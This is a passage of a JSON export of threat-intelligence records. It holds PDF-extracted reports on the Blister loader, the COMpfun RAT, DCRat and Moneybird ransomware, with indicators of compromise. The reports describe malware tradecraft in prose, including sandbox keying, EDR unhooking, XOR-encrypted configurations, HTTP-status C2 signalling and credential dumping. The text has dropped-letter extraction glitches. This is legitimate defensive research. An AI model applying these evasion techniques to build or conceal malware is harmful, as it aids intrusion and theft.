purchase a Windows license should look at\n\nalternative options instead, such as accepting the limitations of the free\n\nversion, monitoring for special offers from trustworthy platforms, or using\n\nLinux.\n\nUltimately, users should not trust license activators and any unsigned\n\nexecutable authored and released by unknown vendors to run on your system.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-19T17:35:36.921Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "6509f85f5e86192e8872416c"
  },
  "name": "Blister",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Blister.pdf",
  "file_size": "104 KB",
  "content": "In a fast-paced and ever-changing world of cybercrime threats, the tenacity and\nadaptability of malicious actors is a signicant concern. BLISTER, a malware loader\ninitially discovered by Elastic Security Labs in 2021 and associated with\nnancially-motivated intrusions, is a testament to this trend as it continues to develop\nadditional capabilities. Two years after its initial discovery, BLISTER continues to receive\nupdates while ying under the radar, gaining momentum as an emerging threat. Recent\nndings from Palo Altos Unit 42 describe an updated SOCGHOLISH infection chain\nused to distribute BLISTER and deploy a payload from MYTHIC, an open-source\nCommand and Control (C2) framework.\n\nKey takeaways\n\n Elastic Security Labs has been monitoring malware loader BLISTER ramping up\nwith new changes, and ongoing development with signs of imminent threat\nactivity\n\n New BLISTER update includes keying feature that allows for precise targeting of\n\nvictim networks and lowers exposure within VM/sandbox environments\n\n BLISTER now integrates techniques to remove any process instrumentation hook\nand has modied its conguration with multiple revisions, now encompassing\nadditional elds and ags.\n\nOverview\n\nOur research uncovered new functionality that was previously absent within the\nBLISTER family, indicating ongoing development. However, the malware authors\ncontinue to use a distinctive technique of embedding malicious code in otherwise\nlegitimate applications. This approach supercially appears successful, given the low\nrates of detection for many vendors as seen in VirusTotal. The signicant amount of\nbenign code and use of encryption to protect the malicious code are likely two factors\nimpacting detection.\n\nRecently, Elastic Security Labs has observed many new BLISTER loaders in the wild.\nAfter analyzing various samples, its clear that the malware authors have made some\nchanges and have been watching the antivirus industry closely. In one sample from\n\n\fearly June, we can infer that the authors were testing with a non-production loader that\ndisplays a Message Box displaying the strings Test.\n\nReaders can see a disassembled view of this functionality below.\n\nBy the end of July, we observed campaigns involving a new BLISTER loader that\ntargeted victim organizations to deploy the MYTHIC implant.\n\nAt the time of this writing, Elastic Security Labs is seeing a stream of BLISTER samples\nwhich deploy MYTHIC and have very low rates of detection.\n\nComparative analyses\n\nSmuggling malicious code\n\nThe authors behind BLISTER employ a consistent strategy of embedding BLISTER's\nmalicious code within a legitimate library. The most recent variants of this loader have\ntargeted the VLC Media Player library to smuggle their malware into victim\nenvironments. This blend of benign and malicious code seems effective at defeating\nsome kinds of machine-learning models.\n\nThe following is a comparison between a legitimate VLC DLL and one that is infected\nwith BLISTERs code. In the infected sample, the entry point that references malicious\ncode has been indicated in red. This methodology is similar to prior BLISTER variants.\n\nDifferent hashing algorithm\n\n\fOne of the changes implemented since our last write-up is the adoption of a different\nhashing algorithm used in the core and in the loader part of BLISTER. While the previous\nversion used simple logic to shift bytes, this new version includes a hard-coded seed\nwith XOR and multiplication operations. Researchers speculate that changing the\nhashing approach helps to evade antimalware products that rely on YARA signatures.\n\nConfiguration retrieval\n\nFollowing the decryption of malicious code by the BLISTERd loader, it employs an\nidentical memory scanning method to identify the conguration data blob. This is\naccomplished by searching for a predetermined, hardcoded memory pattern. A notable\ncontrast from the earlier iteration of BLISTER lies in the fact that the conguration is\nnow decrypted in conjunction with the core code, rather than being treated as a\nseparate entity.\n\nEnvironmental keying\n\nA recent addition to BLISTER is the capability to exclusively execute on designated\nmachines. This behavior is activated by conguring the appropriate ag within the\nmalwares conguration. Subsequently, the malware proceeds to extract the machine's\ndomain name using the GetComputerNameExW Windows API. Following this, the domain\nname is hashed using the previously mentioned algorithm, and the resulting hash is\nthen compared to a hash present in the conguration. This functionality is presumably\ndeployed for the purpose of targeted attacks or for testing scenarios, ensuring that the\nmalware refrains from infecting unintended systems such as those employed by\nmalware researchers.\n\nOne of the few malware analysis tools capable of quickly exposing this behavior is the\nawesome Tiny Tracer utility by hasherezade. Weve included an excerpt from\nTiny_Tracer below which captures the BLISTER process immediately terminating after\nthe GetComputerNameExW validation is performed in a sandboxed analysis VM.\n\nTime-based anti-debugging feature\n\n\fSimilar to its predecessors, the malware incorporates a time-based anti-debugging\nfunctionality. However, unlike the previous versions in which the timer was hardcoded,\nthe updated version introduces a new eld in the conguration. This eld enables the\ncustomization of the sleep timer, with a default value of 10 minutes. This default interval\nremains unchanged from prior iterations of BLISTER.\n\nUnhook process instrumentation to detect syscalls\n\nIn this latest version, BLISTER introduces noteworthy functionality: it unhooks any\nongoing process instrumentation, a tactic designed to circumvent userland syscall\ndetection mechanisms upon which certain EDR solutions are based.\n\nBLISTER's configuration\n\nThe BLISTER conguration structure has also been changed with the latest variants.\nTwo new elds have been added and the ag eld at offset 0 has been changed from a\nWORD to a DWORD value. The new elds pertain to the hash of the domain for\nenvironmental keying and the congurable sleep time; these eld values are at offset 4\nand 12 respectively. The following is the updated structure of the conguration:\n\nChanges have also been made to the conguration ags, allowing the operator to\nactivate different functions within the malware. Researchers have provided an updated\nlist of functions built upon our prior research into BLISTER.\n\nPayload extractor update\n\nIn our previous research publication, we introduced an ecient payload extractor\ntailored to dissect and extract the conguration and payload of the loader. To dissect\nthe most recent BLISTER variants and capture these new details, we enhanced our\nextractor which is available here.\n\n\fConclusion\n\nBLISTER is one small part of the global cybercriminal ecosystem, providing\nnancially-motivated threats to gain access to victim environments and avoid detection\nby security sensors. The community should consider these new developments and\nassess the ecacy of BLISTER detections, Elastic Security Labs will continue to monitor\nthis threat and share actionable guidance.\n\nSecurity researchers have uncovered a malicious campaign that relies on a\n\nvalid code-signing certificate to disguise malicious code as legitimate\n\nexecutables.\n\nOne of the payloads that the researchers called Blister, acts as a loader for\n\nother malware and appears to be a novel threat that enjoys a low detection\n\nrate.\n\nThe threat actor behind Blister has been relying on multiple techniques to\n\nkeep their attacks under the radar, the use of code-signing certificates being\n\nonly one of their tricks.\n\nThousands of Juniper devices vulnerable to\n\nunauthenticated RCE flaw\n\nSigned, sealed, delivered\n\n\fWhoever is behind Blister malware has been running campaigns for at least\n\nthree months, since at least September 15, security researchers from Elastic\n\nsearch company found.\n\nThe threat actor used a code-signing certificate that is valid from August 23,\n\nthough. It was issued by digital identity provider Sectigo for a company called\n\nBlist LLC with an email address from a Russian provider Mail.Ru.\n\nsource: Elastic\n\nUsing valid certificates to sign malware is an old trick that threat actors\n\nlearned years ago. Back then, they used to steal certificates from legitimate\n\ncompanies. These days, threat actors request a valid cert using details of a firm\n\nthey compromised or of a front business.\n\nIn a blog post this week, Elastic says that they responsibly reported the abused\n\ncertificate to Sectigo so it could be revoked.\n\nThe researchers say that the threat actor relied on multiple techniques to keep\n\nthe attack undetected. One method was to embed Blister malware into a\n\nlegitimate library (e.g. colorui.dll).\n\nThe malware is then executed with elevated privileges via the rundll32\n\ncommand. Being signed with a valid certificate and deployed with\n\nadministrator privileges makes Blister slip past security solutions.\n\nIn the next step, Blister decodes from the resource section bootstrapping code\n\nthat is heavily obfuscated, Elastic researchers say. For ten minutes, the code\n\nstays dormant, likely in an attempt to evade sandbox analysis.\n\nIt then kicks into action by decrypting embedded payloads that provide\n\nremote access and allow lateral movement: Cobalt Strike and BitRAT - both\n\nhave been used by multiple threat actors in the past.\n\n\fThe malware achieves persistence with a copy in the ProgramData folder and\n\nanother posing as rundll32.exe. It is also added to the startup location, so it\n\nlaunches at every boot, as a child of explorer.exe.\n\nElastics researchers found signed and unsigned versions of the Blister loader,\n\nand both enjoyed a low detection rate with antivirus engines on VirusTotal\n\nscanning service.\n\ndetection rate of unsigned Blister malware sample\n\nWhile the objective of these attacks of the initial infection vector remain\n\nunclear, by combining valid code-signing certs, malware embedded in\n\nlegitimate libraries, and execution of payloads in memory the threat actors\n\nincreased their chances for a successful attack.\n\nElastic has created a Yara rule to identify Blister activity and provides\n\nindicators of compromise to help organizations defend against the threat.\n\nUpdate [01/07/2022]: Sectigo's Chief Compliance Officer Tim Callan\n\nprovided the following comment for BleepingComputer regarding the Blister\n\nmalware campaign using a signed certificate:\n\n\"During the week of December 21, 2021, Sectigo was made aware of a\n\ncode-signing certificate being used by the threat actor behind the recently\n\ndiscovered BLISTER malware. Upon discovering the issue, Sectigo\n\nimmediately revoked the compromised certificate.\n\nAs one of the longest-standing publicly trusted Certificate Authorities, Sectigo\n\ntakes careful precautions to ensure that every certificate we issue follows the\n\nguidelines set by the CA/Browser forum. Sectigo does not regulate, control, or\n\nmonitor the business practices of any operator, nor do our services relate in\n\nany way whatsoever with the content distributed by a particular operator.\"\n\n\f\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-19T19:37:03.384Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "650a05c781da25acaed6fff0"
  },
  "name": "COMpfun",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "COMpfun.pdf",
  "file_size": "98 KB",
  "content": "You may remember that in autumn 2019 we published a story about how a COMpfun\nsuccessor known as Reductor infected les on the y to compromise TLS trac. If\nyoure wondering whether the actor behind the malware is still developing new features,\nthe answer is yes. Later in November 2019 our Attribution Engine revealed a new Trojan\nwith strong code similarities. Further research showed that it was obviously using the\nsame code base as COMPFun.\n\nWhats of interest inside\n\nThe campaign operators retained their focus on diplomatic entities, this time in Europe,\nand spread the initial dropper as a spoofed visa application. It is not clear to us exactly\nhow the malicious code is being delivered to a target. The legitimate application was\nkept encrypted inside the dropper, along with the 32- and 64-bit next stage malware.\n\nWe observed an interesting C2 communication protocol utilizing rare HTTP/HTTPS\nstatus codes (check IETF RFC 7231, 6585, 4918). Several HTTP status codes (422-429)\nfrom the Client Error class let the Trojan know what the operators want to do. After the\ncontrol server sends the status Payment Required (402), all these previously received\ncommands are executed.\n\nThe authors keep the RSA public key and unique HTTP ETag in encrypted conguration\ndata. Created for web content caching reasons, this marker could also be used to lter\nunwanted requests to the C2, e.g., those that are from network scanners rather than\ntargets. Besides the aforementioned RSA public key to communicate with the C2, the\nmalware also uses a self-generated AES-128 key.\n\nWho is the author?\n\nWe should mention here once again that the COMPfun malware was initially\ndocumented by G-DATA in 2014; and although the company did not identify which APT\nwas using the malware. Based mostly on victimology, we were able to associate it with\nthe Turla APT with medium-to-low level of condence.\n\nWhat the Trojan is able to do\n\nIts functions include the ability to acquire the targets geolocation, gathering host- and\nnetwork-related data, keylogging and screenshots. In other words, its a normal\nfull-edged Trojan that is also capable of propagating itself to removable devices.\n\n\fAs in previous malware from the same authors, all the necessary function addresses\nresolve dynamically to complicate analysis. To exltrate the targets data to the C2 over\nHTTP/HTTPS, the malware uses RSA encryption. To hide data locally, the Trojan\nimplements LZNT1 compression and one-byte XOR encryption.\n\nInitial dropper\n\nThe rst stage dropper was downloaded from the LAN shared directory. The le name\nrelated to the visa application process perfectly corresponds with the targeted\ndiplomatic entities. As with all modules with a similar code base, the dropper begins by\ndynamically resolving all the required Windows API function addresses and puts them\ninto structures. It then decrypts the next stage malware from its resource (.rsrc) section.\nThe algorithm used to decrypt the next stage is a one-byte XOR using the key 0x55,\nfollowed by LZNT1 decompression.\n\nThe following les are dropped to the disk in addition to the original application that the\nmalware tries to mimic:\n\nThe dropper urges users to run the le as administrator (using messages such as need\nto run as admin), then drops a version corresponding to the hosts architecture and sets\nthe le system timestamp to 2013.12.20 22:31.\n\nInterestingly, the droppers abilities arent limited to PE lures; as an alternative, this stage\nis also able to use .doc and .pdf les. In such cases, the dropper will open the les using\nthe open shell command instead of running the legitimate spoofed executable\napplication.\n\nMain module  HTTP status-based Trojan\n\nThe analysis below is based on the 32-bit sample from the table above. The legitimate\nExplorerFrame.dll.mui is a language resource for the ExplorerFrame.dll le used by\nWindows Explorer.\n\nInitialization\n\nAs usual in this malware familys code, a huge number of short standalone functions\nreturn all the readable strings. This is done to complicate analysis by not allowing the\nstrings to be visible at a glance for researchers. The modules preparation stage\ndynamically resolves all required Windows API function addresses into corresponding\ncustom structures. Afterwards the malware uses indirect function calls only.\n\n\fThe module obtains the processor architecture (32- or 64-bit) and Windows OS version.\nIt includes a number of anti-analysis checks for virtual machine-related devices\n(VEN_VMWARE, VBOX_HARDDISK, Virtual_DVD_ROM, etc.) to avoid controlled\nexecution. It also notes which security products are running on the host (Symantec,\nKaspersky, Dr.Web, Avast).\n\nBefore every communication with the C2, the malware checks if software such as\ndebuggers (WinDbg, OllyDbg, Visual Studio) and host (Process Explorer or Monitor, etc.)\nor network monitoring (Wireshark, TCPView, etc.) programs are running. It also checks\nfor internet connectivity and does not attempt to communicate if the checks fail.\n\nThe DLL also checks for potentially available launch processes that it can inject itself\ninto. In the case of PaymentRequired, this could be system, security product or browser\nprocesses. Then the malware forms the corresponding code to drop les, delete les,\netc.\n\nThe last step in the initialization procedure is to decrypt and decompress the\nconguration le. Decryption is done via a one-byte XOR using the 0xAA key, followed by\ndecompression using the LZNT1 algorithm. From the conguration, the malware parses\nthe RSA public key, ETag and IP addresses to communicate with its control servers.\n\nHTTP status-based communication module\n\nFirstly, the module generates the following:\n\n  AES-128 encryption key used in HTTP GET/POST parameters and HTTP status\n\ncode 427 (request new command);\n4-byte unique hardware ID (HWID) based on the host network adapters, CPU and\nrst xed logical drive serial number.\n\nThe module then chooses a process to inject the code into, in order of decreasing\npriority, starting from Windows (cmd.exe, smss.exe), security-related applications\n(Symantecs nis.exe, Dr.Webs spideragent.exe) and browsers (IE, Opera, Firefox, Yandex\nbrowser, Chrome).\n\nThe main thread checks if the C2 supports TLS in its conguration. If it does,\ncommunication will be over HTTPS and port 443; otherwise, the HTTP protocol and port\n80 are used.\n\n \n\fDecrypted conguration content inside the analyzed sample\n\nThe rst GET request sent contains an ETag If-Match header that is built using data\nfrom its decrypted conguration. ETags are normally used by web servers for caching\npurposes in order to be more ecient and save bandwidth by not resending redundant\ninformation if an ETag value matches. The implementation of ETags means the C2 may\nignore all requests that are not sent from its intended targets if they dont have the\nrequired ETag value.\n\nC2 HTTP status code descriptions, including installation, USB propagation, ngerprinting,\netc.\n\nHTTP 427 can receive any of the following appended commands:\n\nRemovable device propagation module\n\nIf initialization is successful, the malware starts one more thread for dispatching\nWindows messages, looking for removable devices related to a WM_DEVICECHANGE\nevent. The module runs its own handlers in the event of a USB device being plugged into\nor unplugged from the host.\n\nOther spying modules: keylogger, screenshot tool and more\n\nThe users activity is monitored using several hooks. All of them gather the targets data\nindependently of any C2 command. Keystrokes are encrypted using the RSA public key\nstored in the conguration data and sent once every two seconds, or when more than\n512 bytes are recorded. These 512 characters also include left mouse button clicks\n(written as the MSLBTN string) and Windows title bar texts. For clipboard content, the\nmodule calculates an MD5 hash and if it changes, encrypts the clipboard content with\nthe same RSA public key and then sends it.\n\nIn a separate thread, the Trojan takes a bitmap screenshot using the GDIPlus library,\ncompresses it with the LZNT1 algorithm, encrypts it using the key from the\nconguration data and sends it to the control server. A screenshot will be taken of the\ntarget and sent anyway, independently of any C2 command.\n\nLast but not least\n\nThere are several choices  albeit not major additional technical ones  that the\nmalware author made which we consider to be noteworthy.\n\n\fThe COM-hijacking-based persistence method injects its corresponding code and\nstructure as a parameter into a legitimate processs memory. The malware geolocates\nvictims using legitimate web services: geoplugin.net/json.gp, ip-api.com/json and\ntelize.com/geoip.\n\nThe unusual thread synchronization timeout calculation in the HTTP status thread is\npeculiar. Mathematically, the partial sum of the series is precisely:\n\nThis series, in the case of a full sum, is just a representation of the exponent. The\ndevelopers probably used the exponent to make timeouts in the communication thread\nmore unpredictable and grow at fast rate, and the compiler calculated it this way.\n\nSo what did the COMPFun authors achieve?\n\nWe saw innovative approaches from the COMpfun developers twice in 2019. First, they\nbypassed TLS encrypted trac via PRNG system function patching, and then we\nobserved a unique implementation of C2 communications using uncommon HTTP\nstatus codes.\n\nThe malware operators retained their focus on diplomatic entities and the choice of a\nvisa-related application  stored on a directory shared within the local network  as the\ninitial infection vector worked in their favor. The combination of a tailored approach to\ntheir targets and the ability to generate and execute their ideas certainly makes the\ndevelopers behind COMPFun a strong offensive team.\n\nIndicators of compromise\n\nFile MD5 Hashes\nTrojan 32-bit: A6AFA05CBD04E9AF256D278E5B5AD050\nTrojan 64-bit: 1BB03CBAD293CA9EE3DDCE6F054FC325\n\nIPs\n95.183.49.10\n95.183.49.29\n200.63.45.35\n\n\fA new COMpfun remote access trojan (RAT) variant controlled using\n\nuncommon HTTP status codes was used in attacks targeting European\n\ndiplomatic entities.\n\nThis malware was first spotted and analyzed by G-Data in 2014, while another\n\ntrojan featuring \"strong code similarities\" capable of carrying out\n\nman-in-the-middle (MitM) attacks on encrypted traffic was discovered by\n\nKaspersky in 2019, which later dubbed it Reductor.\n\nEven though G-Data did not attribute COMpfun to any specific malware\n\nauthor, Kaspersky associates it \"with the Turla APT with a medium-to-low\n\nlevel of confidence\" based on the victims its operators are targeting.\n\nUpgraded remote access trojan\n\nThe new COMpfun malware variant was discovered by Kaspersky in\n\nNovember 2019 and it comes with all the capabilities all RAT malware\n\nfeatures.\n\nOnce it infects a target's system, it starts collecting information for its masters,\n\npacks it all up, and sends it to its command and control (C2) servers.\n\nCOMpfun harvests geolocation info and system data, it logs window titles and\n\nall keystrokes on compromised systems, and it takes screenshots that allow it\n\nto capture sensitive information from the victim's screen.\n\nHowever, unlike other RATs, this one also has the ability to propagate to other\n\n(potentially air-gapped) devices by monitoring for and infecting any\n\nremovable devices connected to the compromised devices.\n\n\f\"If initialization is successful, the malware starts one more thread for\n\ndispatching Windows messages, looking for removable devices related to a\n\nWM_DEVICECHANGE event,\" Kaspersky explains.\n\n\"The module runs its own handlers in the event of a USB device being plugged\n\ninto or unplugged from the host.\"\"\n\nMalware controlled using HTTP status codes\n\nThe most interesting addition to this new COMpfun version is the HTTP\n\nstatus-based communication module which allows the malware operators to\n\nbypass detection by avoiding to use known malicious traffic patterns.\n\n\"We observed an interesting C2 communication protocol utilizing rare\n\nHTTP/HTTPS status codes (check IETF RFC 7231, 6585, 4918),\" Kaspersky\n\nsays.\n\nDepending on the HTTP status code received by systems infected with\n\nCOMpfun malware, the attackers can request them to exfiltrate all the\n\ncollected data to the C2 server, to gain persistence, fingerprint the hosts, to\n\nenumerate network resources, propagate to USB removable devices, and\n\nmore.\n\nThe full list of codes used to control the compromised systems, their RFC\n\nstatus meaning, and the corresponding command functionality is embedded\n\nin the table below.\n\n\"The malware operators retained their focus on diplomatic entities and the\n\nchoice of a visa-related application  stored on a directory shared within the\n\n\flocal network  as the initial infection vector worked in their favor,\" Kaspersky\n\nconcludes.\n\n\"The combination of a tailored approach to their targets and the ability to\n\ngenerate and execute their ideas certainly makes the developers behind\n\nCOMPFun a strong offensive team.\"\n\nESET researchers have uncovered another new malware toolkit they named\n\nRamsay, also capable of infecting air-gapped systems by abusing removable\n\ndrives and network shares, and of exfiltrating files it harvests via\n\nInternet-connected computers on the same network.\n\nMore details and information on the inner workings of the COMpfun RAT, as\n\nwell as indicators of compromise (IOCs), are available within Kaspersky's full\n\nreport on the newly discovered variant.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-19T20:34:15.135Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "650b04ebaa013481ea3bf4c4"
  },
  "name": "DCRat",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "DCRat.pdf",
  "file_size": "82 KB",
  "content": "A bargain-basement, $5 price tag on a 3-year-old remote access Trojan (RAT) has\n\nconcerned some security researchers, who see the move as signs of a possible race to\n\nthe bottom in terms of pricing  or that new, disrupting developers are entering the\n\ncybercriminal market.\n\nAccording to an analysis of the malware by software and security firm BlackBerry, an\n\nextremely low-cost variant of the malware known as the Dark Crystal RAT (aka DCRat)\n\nappears to be the brainchild of a sole Russian developer. The creator wrote the code in\n\nthe popular C#, but also coded the administrative server in the relatively obscure JPHP,\n\na clone of the PHP Web language that runs on a Java virtual machine. The malware\n\nplatform has become popular with entry-level hackers but has many of the features \n\nsuch as a modular architecture and custom plug-ins  of better-known programs.\n\nThe malware may only be a niche threat, but the development of new  albeit, minor \n\nattack tools highlights the fact that companies need to be vigilant, says Jim Simpson,\n\ndirector of threat intelligence at BlackBerry.\n\n\"Nothing makes it especially dangerous  it is another thing to be aware of and take\n\nthe usual precautions over,\" he says, adding that companies should make sure that their\n\nend users are trained on spotting and reporting suspicious emails and that multifactor\n\nauthentication is deployed. \"It is likely someone, seeing a gap in the market for a\n\ncheaper toolset, created something that would work for people looking to fill that need.\"\n\nYet the low, low price of the software has rung some warning bells for researchers. In\n\nthe world of legitimate software, open source and free is the name of the game, but\n\nprofit-minded cybercriminals offering bottom-of-the-barrel pricing is an anomaly, the\n\nresearchers said.\n\n\"This price range is a curious feature, as it makes it seem like the author is not\n\nparticularly profit-driven,\" the BlackBerry researchers stated in the analysis. \"It could be\n\nthat theyre simply casting a wide net, trying to get a little money from a lot of\n\nmaliciously minded people. It could also be that they have an alternative source of\n\nfunding, or this is a passion project rather than their main source of income.\"\n\n\fSimpson notes that a lone-wolf operator has lower operating costs and overhead, so\n\nthat could lead to lower prices. In addition, while the original price had been set at 500\n\nrubles, the devaluation of the Russian currency led the developer to set the latest prices\n\nin US dollars.\n\n\"If you pay a pittance for something, you would be wise to expect it to be less functional\n\nor poorly supported, but DCRat seems to break that rule in a way thats deeply\n\nperplexing,\" the researchers said. \"This RAT's code is being improved and maintained\n\ndaily. If the threat is being developed and sustained by just one person, it appears that\n\nits a project they are working on full-time.\"\n\nInside the World of the Dark Crystal (RAT)\n\nThe Dark Crystal malware first appeared at least as early as 2018, with the program\n\nwritten in Java, according to a May 2020 analysis by incident response firm Mandiant. In\n\n2019, the developer added a customized plug-in frameworks and redesigned the\n\nprogram using C#. In 2020, the program had at least 50 different commands and had\n\ncaught the attention of incident responders, according to Mandiant's analysis.\n\nThe DCRat malware has three different components: A malicious program that runs on\n\nthe compromised systems, a single webpage written in PHP that acts as the\n\ncommand-and-control interface, and the administrator tool written in JPHP, an\n\nuncommon programming language typically used by beginning programmers interested\n\nin games. The use of JPHP is likely because the developer is conversant in that\n\nprogramming language rather than because of any specific advantage, BlackBerry's\n\nSimpson says.\n\n\"The client itself is now .NET based,\" he says. \"Its only the admin panel  server-side\n\n that is developed in JPHP, and its unlikely chosen for its obfuscation, more likely for\n\nits ease of development and portability between operating systems.\"\n\nThe evolution of DCRat fits right in with the trend of groups moving to create their own\n\ninfrastructure, with the goal of turning access, compromise, and ransomware into\n\nservices. While some remote access platforms  such as the industrial control system\n\n\f(ICS)-focused Pipedream  are the product of teams sponsored by nation-states,\n\nothers come from smaller groups of cybercriminal operators that are focused on staying\n\nahead of defenders and reverse engineers, just like DCRat.\n\nThe REvil malware, for example, has returned from the dead, after international\n\ninvestigators and law-enforcement agencies disrupted the group and Russia arrested\n\nsome of the group's members. A recent ransomware sample and reconstituted\n\ninfrastructure suggest that someone, or some group, with connections to the previous\n\noperators are now reviving the ransomware-as-a-service (RaaS) offering.\n\nWhile DCRat's cut-rate malware does not measure up to many threats, the attack tool is\n\nfrequently being improved, and threat-intelligence analysts should keep an eye on its\n\nevolution, the BlackBerry team noted.\n\nA malware campaign is using fake OnlyFans content and adult lures to install\n\na remote access trojan known as 'DcRAT,' allowing threat actors to steal data\n\nand credentials or deploy ransomware on the infected device.\n\nOnlyFans is a content subscription service where paid subscribers can access\n\nprivate photos, videos, and posts from adult models, celebrities, and social\n\nmedia personalities.\n\nIt is a widely used site and a highly recognizable name, so it can act as a\n\nmagnet for people looking to access paid content for free.\n\nMicrosoft to start retiring Exchange Web\n\nServices in October 2026\n\nThis is not the first time threat actors have taken advantage of OnlyFans to\n\nachieve their malicious goals, as in January 2023, attackers abused an open\n\nredirect on a UK state site to direct visitors to fake OnlyFans sites.\n\n\fThe new campaign discovered by eSentire has been underway since January\n\n2023, spreading ZIP files that contain a VBScript loader the victim is tricked\n\ninto executing manually, thinking they're about to access premium OnlyFans\n\ncollections.\n\nThe infection chain is unknown, but it might be malicious forum posts, instant\n\nmessages, malvertising, or even Black SEO sites that rank high in specific\n\nsearch terms. A sample shared by Eclypsium pretends to be nude photos of\n\nformer adult film actress Mia Khalifa.\n\nThe VBScript loader is a minimally modified and obfuscated version of a script\n\nobserved in a 2021 campaign discovered by Splunk, which was a slightly\n\nmodified Windows printing script.\n\nWhen launched, it checks the OS architecture using WMI and spawns a 32-bit\n\nprocess as required for the following steps, extracts an embedded DLL file\n\n(\"dynwrapx.dll\"), and registers the DLL with the Regsvr32.exe command.\n\nThis gives the malware access to DynamicWrapperX, a tool that enables\n\ncalling functions from the Windows API or other DLL files.\n\nUltimately, the payload, named 'BinaryData,' is loaded into memory and\n\ninjected into the 'RegAsm.exe' process, a legitimate part of the .NET\n\nFramework less likely to be flagged by AV tools.\n\nThe injected payload is DcRAT, a modified version of AsyncRAT that is freely\n\navailable on GitHub and which its author abandoned after several abuse cases\n\nsurfaced online.\n\nOne of these cases comes from October 2021, when a politically-themed threat\n\nactor dropped it onto compromised systems along with several other malware\n\nfamilies.\n\n\fDcRAT performs keylogging, webcam monitoring, file manipulation, and\n\nremote access, and it can also steal credentials and cookies from web browsers\n\nor snatch Discord tokens.\n\nAdditionally, DcRAT features a ransomware plugin that targets all non-system\n\nfiles and appends the \".DcRat\" filename extension onto encrypted files.\n\nIt is important to exercise caution when downloading archives or executables\n\nfrom dubious sources, especially those offering free access to premium/paid\n\ncontent.\n\n\f",
  "status": "COMPLETE",
  "report_type": "FILE",
  "message": "Completed Successfully",
  "added_on": {
    "$date": "2023-09-20T14:42:51.603Z"
  },
  "added_by": "aBBE77QoFYdpJwju50t49rKS3s02",
  "updated_by": null,
  "updated_on": null,
  "gcloud_request": null
},
{
  "_id": {
    "$oid": "650b1bb64ef4f40249f09d57"
  },
  "name": "Moneybird",
  "file_type": "application/pdf",
  "website_url": "",
  "website_title": null,
  "file_name": "Moneybird.pdf",
  "file_size": "141 KB",
  "content": "While responding to a ransomware attack against an\nIsraeli organization, the Check Point Incident Response\nTeam (CPIRT) and CPR identified a new strain of\nransomware called Moneybird. Although the payload itself\nwas unique, the TTPs demonstrated in the attack had\nclear overlaps with a threat actor known as Agrius. The\ndata was eventually leaked by an entity with one of the\ngroups known aliases.\n\nFirst introduced in 2021, Agrius is an Iran-aligned threat\nactor that operates mostly in the Middle-East. The actor\nhas been tied to several ransomware and wiper attacks,\nwith a major focus on Israeli institutions. The groups\naffiliation within Iran is not clear, although recent reports\nhave tied it to the Iranian Ministry of Intelligence and\nSecurity (MOIS).\n\nThe newly discovered ransomware used by the group,\nMoneybird, was used to target organizations in Israel. This\ncorrelates with Agrius past activities against other\norganizations in Israel, most notably Shirbit and Bar Ilan\nUniversity. The group has used a wide set of aliases for its\nextortion entities. BlackShadow, the name used by the\ngroup to extort Shirbit, was the first known alias Agrius has\ntaken and is still commonly associated with it.\n\n\fAgrius ransomware operations have been mostly tied to a\ncustom ransomware called Apostle, which was originally a\nwiper. The use of a new ransomware, written in C++, is\nnoteworthy, as it demonstrates the groups expanding\ncapabilities and ongoing effort in developing new tools.\n\nActivity Analysis\n\nAgriuss actions leading to the deployment of Moneybird\ncorrelates to previous reports of the groups activity.\n\nFigure 1  High-level overview of Agrius activities leading\nto the deployment of Moneybird ransomware.\n\nAgrius first foothold was established by exploiting\nvulnerabilities within public-facing web servers, leading to\nthe deployment of unique variants of ASPXSpy. The\nexploitation and the post-exploitation activities were\ncarried out using public VPN services nodes, most\nprominently ProtonVPN nodes in Israel.\n\nThe ASPXSpy webshells were deployed in a unique\nfashion, hidden inside Certificate text files. This method\nis tied to past observed group activities. To use the\nwebshell, the actor decoded the content of the file into a\nseparate ASPX file.\n\n\fFigure 2  Webshell encoded within a fake certificate text\nfile.\n\nFollowing the deployment of webshells, the threat actor\nwas observed utilizing several publicly available tools to\nperform recon, move laterally, harvest credentials, and\nexfiltrate data. The tools include:\n\n SoftPerfect Network Scanner  Scan internal\n\nnetworks.\n\n Plink  RDP tunnel traffic from a VPS owned by the\n\nactor.\n\n ProcDump  Dump LSASS and harvest credentials.\n\n****\n\n FileZilla  Exfiltrate compressed files.\n\nInterestingly enough, the actor performed most of the\nactivity while manually connected through RDP. To\ndownload some of the payloads, the actor opened a\nbrowser and connected to the legitimate file sharing\nservices ufile[.]io and easyupload[.]io that\nhosted the malicious files.\n\nOne of the files the threat actor downloaded was the\nransomware executable stored within an archive \nMoneybird.\n\nMoneybird Ransomware  Technical Analysis\n\n\fMoneybird is written in C++ and contains an indicative\nPDB path:\nC:\\Users\\user\\Desktop\\moneybird\\x64\\Release\n\\moneybird.pdb. The name embedded within the\nransomware sample reveals that the encryptor shares the\nsame name that appears in the attack ransom note for the\nattack: Moneybird.\n\nFigure 3  Moneybird ransom note.\n\nMany recent ransomware strains typically support\ncommand-line parameters that enable attackers to\ncustomize malware functionality on top of the malwares\nembedded configuration. This specific threat lacks any\ncommand-line parsing capability. Instead, it includes a\nconfiguration blob embedded within the tool itself, which\nmakes it less suitable for mass campaigns with different\nenvironments.\n\nFigure 4  Moneybird configuration.\n\nThis configuration contains several key elements that are\nused when the malware is executed. The sample ignores\nthe first DWORD. The second one contains an integer\nvalue representing the number of milliseconds the\nmalware waits before executing.\n\n\fAfter these initial values, the configuration includes 